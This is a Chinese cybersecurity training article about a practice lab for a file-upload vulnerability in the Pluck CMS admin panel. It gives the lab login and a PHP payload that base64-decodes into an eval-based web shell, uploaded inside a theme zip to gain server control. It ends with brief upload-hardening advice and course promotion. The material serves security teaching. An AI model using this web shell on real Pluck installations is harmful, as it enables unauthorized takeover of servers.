靶场科普 | 文件上传实战之pluck

admin 2024年9月28日14:39:01评论12 views字数 779阅读2分35秒阅读模式
靶场科普 | 文件上传实战之pluck
靶场科普 | 文件上传实战之pluck
点击上方蓝字关注,更多惊喜等着你
靶场科普 | 文件上传实战之pluck
靶场科普 | 文件上传实战之pluck

本文由“网络安全检测与防护技术国家地方联合工程研究中心深圳分中心——东塔网络安全学院”总结归纳

靶场科普 | 文件上传实战之pluck
靶场介绍

文件上传实战之pluck

靶场科普 | 文件上传实战之pluck

今天,给大家介绍一下“东塔攻防世界”其中的一个靶场:文件上传实战之pluck”。

一、实验介绍

1.pluck是一个小型简单的内容管理系统,由PHP写成。即使你没有编程语言知识,也可以很容易地使用它来管理站点,功能有给页面插照片、在blog里写文章、分享照片等 

2.pluck cms后台存在文件上传漏洞,攻击者可以利用该漏洞获取获取服务器权限

靶场科普 | 文件上传实战之pluck

二、实验目的

1.掌握pluck的概念

2.了解当Pluck CMS后台存在文件上传漏洞时,攻击者怎么利用该漏洞获取服务器权限。

三、实验步骤

1.打开实验靶场,了解上传点,以及利用方法,登录密码为:admin

2.准备一个info.php,内容为:file_put_contents('hack.php',base64_decode('PD9waHAgZXZhbCgkX0dFVFsnYSddKTs/Pg=='));?>

3.然后打包压缩成shell.zip,上传安装主题,然后点击回到主题页,此时触发文件包含。

四、防御方法

1.对上传的文件进行严格检测

2.上传后的文件名进行重命名,并且隐藏上传后文件的路径,不容易被猜到

速度登录https://labs.do-ta.com/ GET起来

现在注册,立得50积分哟 ✌

东塔网络安全学院在各大平台均上线了各项活动和学习内容,快快登录以下各大平台学习起来吧~

微博、腾讯课堂、知乎、今日头条:

东塔网络安全学院

抖音:东塔网络安全培训

哔哩哔哩:东塔网络安全

了解更多活动和咨询欢迎微信添加:dongtakefu

靶场科普 | 文件上传实战之pluck

-免费获取学习资料

电子书籍、试听课程-

靶场科普 | 文件上传实战之pluck

靶场科普 | 文件上传实战之pluck
靶场科普 | 文件上传实战之pluck
点击蓝字
分享我们

原文始发于微信公众号(东塔网络安全学院):靶场科普 | 文件上传实战之pluck

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日14:39:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶场科普 | 文件上传实战之pluckhttps://cn-sec.com/archives/1087435.html

发表评论

匿名网友 填写信息